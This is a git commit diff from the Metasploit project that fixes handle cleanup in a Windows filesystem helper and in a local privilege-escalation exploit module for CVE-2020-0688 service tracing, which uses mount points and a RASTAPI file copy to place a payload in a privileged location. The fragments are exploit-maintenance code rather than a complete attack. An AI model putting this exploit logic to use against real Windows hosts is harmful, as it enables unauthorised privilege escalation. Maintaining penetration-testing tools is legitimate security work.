Land #13897, Fix dangling reference issue in cve_2020_0688_service_tracing.rb
and filesystem.rb Merge branch 'land-13897' into upstream-master
This commit is contained in:
commit
ba7f1ea486
|
@ -185,7 +185,10 @@ module Msf
|
|||
|
||||
unless result['return']
|
||||
print_error("Error deleting the reparse point. Windows Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
|
||||
return -1
|
||||
end
|
||||
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
result['return']
|
||||
end
|
||||
|
||||
|
@ -209,14 +212,10 @@ module Msf
|
|||
handle
|
||||
end
|
||||
|
||||
def delete_mount_point(path)
|
||||
buffer = ReparseGuidDataBuffer.new
|
||||
buffer.reparse_tag = IO_REPARSE_TAG_MOUNT_POINT
|
||||
|
||||
handle = open_reparse_point(path, true)
|
||||
def delete_mount_point(path, handle)
|
||||
return nil unless handle
|
||||
|
||||
delete_reparse_point(handle, buffer.to_binary_s)
|
||||
session.fs.dir.rmdir(path) # Might need some more logic here.
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
end
|
||||
|
||||
def write_to_memory(process, str)
|
||||
|
@ -327,6 +326,7 @@ module Msf
|
|||
return nil unless handle
|
||||
|
||||
set_reparse_point(handle, reparse_data.to_binary_s)
|
||||
handle
|
||||
end
|
||||
end # FileSystem
|
||||
end # Windows
|
||||
|
|
|
@ -80,7 +80,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
OptString.new('PHONEBOOK_UPLOAD_NAME',
|
||||
[false, 'The name of the phonebook file to trigger RASDIAL (%RAND% by default).', nil])
|
||||
])
|
||||
# stores open handles to cleanup properly
|
||||
end
|
||||
|
||||
def write_reg_value(registry_hash)
|
||||
|
@ -148,18 +147,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
end
|
||||
|
||||
def cleanup_mountpoint(dir)
|
||||
print_status("Delete mountpoint #{dir}")
|
||||
unless delete_mount_point(dir)
|
||||
print_error('Error when deleting the mount point.')
|
||||
end
|
||||
begin
|
||||
session.fs.dir.rmdir(dir)
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
print_error("Error when deleting \"#{dir}\".")
|
||||
end
|
||||
end
|
||||
|
||||
def setup_process
|
||||
begin
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
|
@ -202,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def rastapi_privileged_filecopy(file_contents, exploit_dir, upload_payload_pathname, target_payload_pathname)
|
||||
handles = []
|
||||
handles = [] # stores open handles to cleanup properly
|
||||
reg_hash = create_reg_hash(file_contents.length - 1, exploit_dir)
|
||||
vprint_status("Registry hash = #{reg_hash}")
|
||||
|
||||
|
@ -215,7 +202,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# Create mountpoint
|
||||
print_status('Creating mountpoint')
|
||||
unless create_mount_point(exploit_dir, mount_dir)
|
||||
mount_point_handle = create_mount_point(exploit_dir, mount_dir)
|
||||
unless mount_point_handle
|
||||
fail_with(Failure::Unknown, 'Error when creating the mount point... aborting.')
|
||||
end
|
||||
|
||||
|
@ -270,7 +258,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status("Closing symlink handle #{handle}: #{result['ErrorMessage']}")
|
||||
end
|
||||
print_status('Removing Mountpoint')
|
||||
session.fs.dir.rmdir(exploit_dir)
|
||||
delete_mount_point(exploit_dir, mount_point_handle)
|
||||
print_status('Removing directories')
|
||||
unless moved_md5 == upload_md5
|
||||
fail_with(Failure::Unknown, 'Payload hashes do not match; filecopy failed.')
|
||||
|
|
Loading…
Reference in New Issue